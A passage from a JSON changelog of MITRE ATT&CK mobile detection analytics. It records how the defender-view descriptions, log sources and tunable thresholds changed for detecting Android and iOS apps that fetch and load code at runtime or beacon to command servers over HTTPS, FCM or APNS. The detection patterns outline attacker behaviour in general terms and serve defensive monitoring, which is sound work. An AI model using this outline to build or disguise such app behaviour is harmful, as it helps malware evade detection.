\"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"NSM:Flow\", \"channel\": \"HTTP(S)/QUIC download of executable/opaque content (application/octet-stream, application/zip, application/java-archive, application/x-dex, application/x-sharedlib, text/javascript)\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--764ee29e-48d6-4934-8e6b-7a606aaaafc0\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c\", \"name\": \"android:logcat\", \"channel\": \"Create/write under /data/data/<pkg>/(files|cache)/ or /storage/emulated/0/ with extension .dex/.jar/.so/.zip/.tmp/.js and elevated entropy\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"Network Traffic\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][2]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"android:logcat\", \"channel\": \"SELinux AVC for execmem/execute_no_trans/mprotect following recent writes by same UID\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1\", \"name\": \"android:logcat\", \"channel\": \"DexClassLoader|PathClassLoader load from app-writable path OR dlopen of a freshly created .so\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to78__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to78__0\"><a href=\"#difflib_chg_to78__top\">t</a></td><td class=\"diff_header\" id=\"from78_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Application&nbsp;vetting&nbsp;services&nbsp;may&nbsp;be&nbsp;able&nbsp;to&nbsp;list&nbsp;domains&nbsp;and</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to78__top\">t</a></td><td class=\"diff_header\" id=\"to78_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">From&nbsp;the&nbsp;defender\u2019s&nbsp;view:&nbsp;an&nbsp;app&nbsp;retrieves&nbsp;opaque&nbsp;code&nbsp;(DEX/</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">/or&nbsp;IP&nbsp;addresses&nbsp;that&nbsp;applications&nbsp;communicate&nbsp;with.&nbsp;&nbsp;Mobile</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">SO/JAR/JS)&nbsp;over&nbsp;the&nbsp;network&nbsp;or&nbsp;IPC,&nbsp;writes&nbsp;it&nbsp;into&nbsp;an&nbsp;app-wr</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;security&nbsp;products&nbsp;may&nbsp;provide&nbsp;URL&nbsp;inspection&nbsp;services&nbsp;that&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">itable&nbsp;path,&nbsp;optionally&nbsp;performs&nbsp;verification-bypass&nbsp;behavio</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">could&nbsp;determine&nbsp;if&nbsp;a&nbsp;domain&nbsp;being&nbsp;visited&nbsp;is&nbsp;malicious.&nbsp;Appl</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">rs&nbsp;(reflection,&nbsp;addJavascriptInterface&nbsp;exposure,&nbsp;or&nbsp;execmem&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ication&nbsp;vetting&nbsp;services&nbsp;could&nbsp;look&nbsp;for&nbsp;indications&nbsp;that&nbsp;the</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">friction),&nbsp;and&nbsp;then&nbsp;loads/executes&nbsp;that&nbsp;code&nbsp;via&nbsp;DexClassLoa</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;application&nbsp;downloads&nbsp;and&nbsp;executes&nbsp;new&nbsp;code&nbsp;at&nbsp;runtime&nbsp;(e.g</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">der/PathClassLoader,&nbsp;dlopen,&nbsp;or&nbsp;WebView&nbsp;bridge&nbsp;invocation&nbsp;wi</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">.,&nbsp;on&nbsp;Android,&nbsp;use&nbsp;of&nbsp;`DexClassLoader`,&nbsp;`System.load`,&nbsp;or&nbsp;th</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">thin&nbsp;a&nbsp;short&nbsp;window.&nbsp;The&nbsp;analytic&nbsp;correlates&nbsp;Network&nbsp;Content</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">e&nbsp;WebView&nbsp;`JavaScriptInterface`&nbsp;capability;&nbsp;on&nbsp;iOS,&nbsp;use&nbsp;of&nbsp;J</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;\u2192&nbsp;File&nbsp;Creation/Modification&nbsp;\u2192&nbsp;OS&nbsp;API&nbsp;Execution&nbsp;(loader/sys</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">SPatch&nbsp;or&nbsp;similar&nbsp;capabilities).</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">call/SELinux&nbsp;friction)&nbsp;\u2192&nbsp;Module&nbsp;Load&nbsp;(DexClassLoader/dlopen)</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;and,&nbsp;for&nbsp;WebView&nbsp;paths,&nbsp;Application&nbsp;Log&nbsp;signals&nbsp;of&nbsp;JavaScri</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">pt&nbsp;interface&nbsp;attachment.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--b6d9d5a1-5966-4888-b4ce-30b125043c4d",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-01-29 17:39:29.213000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0618#AN1678",
                            "external_id": "AN1678"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1678",
                    "description": "From the defender\u2019s view: a sandboxed app retrieves code-like content (JS/Mach-O/bundles), writes it to container tmp/Caches, performs memory permission changes (RW\u2192RX/RWX) or directly loads via dyld/dlopen from writable paths, sometimes preceded by 3rd-party hotpatch frameworks (e.g., JSPatch-like behavior) or script engine evaluation. The analytic correlates Network Content \u2192 File Creation \u2192 OS API Execution (memory permission change) \u2192 Module Load (dyld/dlopen) and/or Process Access (codesign validation touches), with optional scripting engine events.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "iOS:unifiedlog",
                            "channel": "Per-App VPN flow with code-like content types (application/octet-stream, application/zip, text/javascript, application/x-mach-o)"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
                            "name": "iOS:unifiedlog",
                            "channel": "Create/write in /var/mobile/Containers/Data/Application/<GUID>/(tmp|Library/Caches)/ for .js/.bundle/.dylib/.zip with elevated entropy"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "iOS:unifiedlog",
                            "channel": "mmap/mprotect transitions to PROT_EXEC for pages associated with recently written files"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1",
                            "name": "iOS:unifiedlog",
                            "channel": "dlopen/image load from app-writable path (tmp, Caches) outside bundled resources"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindowSeconds",
                            "description": "Max correlation window between download \u2192 write \u2192 load (e.g., 15\u201360s)."
                        },
                        {
                            "field": "ContentTypeList",
                            "description": "MIME list treated as code-like (octet-stream, zip, javascript, x-mach-o)."
                        },
                        {
                            "field": "WritablePathRegex",
                            "description": "Regex for app container tmp/Caches writable paths."
                        },
                        {
                            "field": "PayloadEntropyThreshold",
                            "description": "Entropy cutoff to flag code blobs (e.g., \u2265 7.3)."
                        },
                        {
                            "field": "KnownJITAllowlist",
                            "description": "Bundles that legitimately do JIT/script eval to reduce RWX noise."
                        },
                        {
                            "field": "WritableLoadPathRegex",
                            "description": "Regex for loads from writable paths only (exclude app bundle)."
                        },
                        {
                            "field": "UnsignedExecPolicy",
                            "description": "Handle enterprise/dev-provisioned unsigned execution contexts."
                        },
                        {
                            "field": "UserContext",
                            "description": "Foreground/background or Work Profile state to filter noise."
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindowSeconds\", \"description\": \"Max correlation window between download \\u2192 write \\u2192 load (e.g., 15\\u201360s).\"}, {\"field\": \"ContentTypeList\", \"description\": \"MIME list treated as code-like (octet-stream, zip, javascript, x-mach-o).\"}, {\"field\": \"WritablePathRegex\", \"description\": \"Regex for app container tmp/Caches writable paths.\"}, {\"field\": \"PayloadEntropyThreshold\", \"description\": \"Entropy cutoff to flag code blobs (e.g., \\u2265 7.3).\"}, {\"field\": \"KnownJITAllowlist\", \"description\": \"Bundles that legitimately do JIT/script eval to reduce RWX noise.\"}, {\"field\": \"WritableLoadPathRegex\", \"description\": \"Regex for loads from writable paths only (exclude app bundle).\"}, {\"field\": \"UnsignedExecPolicy\", \"description\": \"Handle enterprise/dev-provisioned unsigned execution contexts.\"}, {\"field\": \"UserContext\", \"description\": \"Foreground/background or Work Profile state to filter noise.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-01-29 17:39:29.213000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"From the defender\\u2019s view: a sandboxed app retrieves code-like content (JS/Mach-O/bundles), writes it to container tmp/Caches, performs memory permission changes (RW\\u2192RX/RWX) or directly loads via dyld/dlopen from writable paths, sometimes preceded by 3rd-party hotpatch frameworks (e.g., JSPatch-like behavior) or script engine evaluation. The analytic correlates Network Content \\u2192 File Creation \\u2192 OS API Execution (memory permission change) \\u2192 Module Load (dyld/dlopen) and/or Process Access (codesign validation touches), with optional scripting engine events.\", \"old_value\": \"Application vetting services may be able to list domains and/or IP addresses that applications communicate with. \\nMobile security products may provide URL inspection services that could determine if a domain being visited is malicious.\\nApplication vetting services could look for indications that the application downloads and executes new code at runtime (e.g., on Android, use of `DexClassLoader`, `System.load`, or the WebView `JavaScriptInterface` capability; on iOS, use of JSPatch or similar capabilities).\", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1 @@\\n-Application vetting services may be able to list domains and/or IP addresses that applications communicate with. \\n-Mobile security products may provide URL inspection services that could determine if a domain being visited is malicious.\\n-Application vetting services could look for indications that the application downloads and executes new code at runtime (e.g., on Android, use of `DexClassLoader`, `System.load`, or the WebView `JavaScriptInterface` capability; on iOS, use of JSPatch or similar capabilities).\\n+From the defender\\u2019s view: a sandboxed app retrieves code-like content (JS/Mach-O/bundles), writes it to container tmp/Caches, performs memory permission changes (RW\\u2192RX/RWX) or directly loads via dyld/dlopen from writable paths, sometimes preceded by 3rd-party hotpatch frameworks (e.g., JSPatch-like behavior) or script engine evaluation. The analytic correlates Network Content \\u2192 File Creation \\u2192 OS API Execution (memory permission change) \\u2192 Module Load (dyld/dlopen) and/or Process Access (codesign validation touches), with optional scripting engine events.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"iOS:unifiedlog\", \"channel\": \"Per-App VPN flow with code-like content types (application/octet-stream, application/zip, text/javascript, application/x-mach-o)\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--764ee29e-48d6-4934-8e6b-7a606aaaafc0\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c\", \"name\": \"iOS:unifiedlog\", \"channel\": \"Create/write in /var/mobile/Containers/Data/Application/<GUID>/(tmp|Library/Caches)/ for .js/.bundle/.dylib/.zip with elevated entropy\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"Network Traffic\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][2]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"iOS:unifiedlog\", \"channel\": \"mmap/mprotect transitions to PROT_EXEC for pages associated with recently written files\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1\", \"name\": \"iOS:unifiedlog\", \"channel\": \"dlopen/image load from app-writable path (tmp, Caches) outside bundled resources\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to168__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to168__0\"><a href=\"#difflib_chg_to168__top\">t</a></td><td class=\"diff_header\" id=\"from168_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Application&nbsp;vetting&nbsp;services&nbsp;may&nbsp;be&nbsp;able&nbsp;to&nbsp;list&nbsp;domains&nbsp;and</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to168__top\">t</a></td><td class=\"diff_header\" id=\"to168_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">From&nbsp;the&nbsp;defender\u2019s&nbsp;view:&nbsp;a&nbsp;sandboxed&nbsp;app&nbsp;retrieves&nbsp;code-lik</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">/or&nbsp;IP&nbsp;addresses&nbsp;that&nbsp;applications&nbsp;communicate&nbsp;with.&nbsp;&nbsp;Mobile</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">e&nbsp;content&nbsp;(JS/Mach-O/bundles),&nbsp;writes&nbsp;it&nbsp;to&nbsp;container&nbsp;tmp/Ca</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;security&nbsp;products&nbsp;may&nbsp;provide&nbsp;URL&nbsp;inspection&nbsp;services&nbsp;that&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ches,&nbsp;performs&nbsp;memory&nbsp;permission&nbsp;changes&nbsp;(RW\u2192RX/RWX)&nbsp;or&nbsp;dire</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">could&nbsp;determine&nbsp;if&nbsp;a&nbsp;domain&nbsp;being&nbsp;visited&nbsp;is&nbsp;malicious.&nbsp;Appl</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ctly&nbsp;loads&nbsp;via&nbsp;dyld/dlopen&nbsp;from&nbsp;writable&nbsp;paths,&nbsp;sometimes&nbsp;pr</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ication&nbsp;vetting&nbsp;services&nbsp;could&nbsp;look&nbsp;for&nbsp;indications&nbsp;that&nbsp;the</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">eceded&nbsp;by&nbsp;3rd-party&nbsp;hotpatch&nbsp;frameworks&nbsp;(e.g.,&nbsp;JSPatch-like&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;application&nbsp;downloads&nbsp;and&nbsp;executes&nbsp;new&nbsp;code&nbsp;at&nbsp;runtime&nbsp;(e.g</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">behavior)&nbsp;or&nbsp;script&nbsp;engine&nbsp;evaluation.&nbsp;The&nbsp;analytic&nbsp;correlat</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">.,&nbsp;on&nbsp;Android,&nbsp;use&nbsp;of&nbsp;`DexClassLoader`,&nbsp;`System.load`,&nbsp;or&nbsp;th</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">es&nbsp;Network&nbsp;Content&nbsp;\u2192&nbsp;File&nbsp;Creation&nbsp;\u2192&nbsp;OS&nbsp;API&nbsp;Execution&nbsp;(memor</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">e&nbsp;WebView&nbsp;`JavaScriptInterface`&nbsp;capability;&nbsp;on&nbsp;iOS,&nbsp;use&nbsp;of&nbsp;J</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">y&nbsp;permission&nbsp;change)&nbsp;\u2192&nbsp;Module&nbsp;Load&nbsp;(dyld/dlopen)&nbsp;and/or&nbsp;Proc</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">SPatch&nbsp;or&nbsp;similar&nbsp;capabilities).</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ess&nbsp;Access&nbsp;(codesign&nbsp;validation&nbsp;touches),&nbsp;with&nbsp;optional&nbsp;scri</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">pting&nbsp;engine&nbsp;events.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--f12b94b0-ec2f-4eb1-9ea4-8632e41475a1",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-02 20:39:33.682000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0620#AN1681",
                            "external_id": "AN1681"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1681",
                    "description": "Defender observes an application establishing recurrent HTTPS or FCM-based communication sessions exhibiting structured cadence, asymmetric request/response sizes, or persistent low-volume polling inconsistent with declared application functionality, potentially embedding command data within web protocol traffic.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "NSM:Flow",
                            "channel": "HTTPS sessions exhibiting periodic request cadence or structured payload exchanges inconsistent with application baseline"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "BeaconIntervalVarianceThreshold",
                            "description": "Defines acceptable deviation in HTTPS polling cadence"
                        },
                        {
                            "field": "PayloadSymmetryThreshold",
                            "description": "Defines acceptable ratio between request and response sizes"
                        },
                        {
                            "field": "AppNetworkRoleBaseline",
                            "description": "Expected mapping between application category and network endpoints"
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_log_source_references']\": [{\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"NSM:Flow\", \"channel\": \"HTTPS sessions exhibiting periodic request cadence or structured payload exchanges inconsistent with application baseline\"}], \"root['x_mitre_mutable_elements']\": [{\"field\": \"BeaconIntervalVarianceThreshold\", \"description\": \"Defines acceptable deviation in HTTPS polling cadence\"}, {\"field\": \"PayloadSymmetryThreshold\", \"description\": \"Defines acceptable ratio between request and response sizes\"}, {\"field\": \"AppNetworkRoleBaseline\", \"description\": \"Expected mapping between application category and network endpoints\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-02 20:39:33.682000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Defender observes an application establishing recurrent HTTPS or FCM-based communication sessions exhibiting structured cadence, asymmetric request/response sizes, or persistent low-volume polling inconsistent with declared application functionality, potentially embedding command data within web protocol traffic.\", \"old_value\": \"Abuse of standard application protocols can be difficult to detect as many legitimate mobile applications leverage such protocols for language-specific APIs. Enterprises may be better served focusing on detection at other stages of adversarial behavior. \"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to105__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to105__0\"><a href=\"#difflib_chg_to105__top\">t</a></td><td class=\"diff_header\" id=\"from105_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Abuse&nbsp;of&nbsp;standard&nbsp;application&nbsp;protocols&nbsp;can&nbsp;be&nbsp;difficult&nbsp;to&nbsp;</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to105__top\">t</a></td><td class=\"diff_header\" id=\"to105_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Defender&nbsp;observes&nbsp;an&nbsp;application&nbsp;establishing&nbsp;recurrent&nbsp;HTTP</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">detect&nbsp;as&nbsp;many&nbsp;legitimate&nbsp;mobile&nbsp;applications&nbsp;leverage&nbsp;such&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">S&nbsp;or&nbsp;FCM-based&nbsp;communication&nbsp;sessions&nbsp;exhibiting&nbsp;structured&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">protocols&nbsp;for&nbsp;language-specific&nbsp;APIs.&nbsp;Enterprises&nbsp;may&nbsp;be&nbsp;bet</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">cadence,&nbsp;asymmetric&nbsp;request/response&nbsp;sizes,&nbsp;or&nbsp;persistent&nbsp;lo</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ter&nbsp;served&nbsp;focusing&nbsp;on&nbsp;detection&nbsp;at&nbsp;other&nbsp;stages&nbsp;of&nbsp;adversar</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">w-volume&nbsp;polling&nbsp;inconsistent&nbsp;with&nbsp;declared&nbsp;application&nbsp;func</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ial&nbsp;behavior.&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tionality,&nbsp;potentially&nbsp;embedding&nbsp;command&nbsp;data&nbsp;within&nbsp;web&nbsp;pro</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tocol&nbsp;traffic.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--a16c57b3-6a4c-4b15-92e9-d2d29f5b7d69",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-02 20:40:39.182000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0620#AN1682",
                            "external_id": "AN1682"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1682",
                    "description": "Defender observes an application establishing recurrent HTTPS or APNS-related communications exhibiting structured cadence, abnormal session persistence, or notification-triggered network bursts inconsistent with user interaction patterns or declared application behavior.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
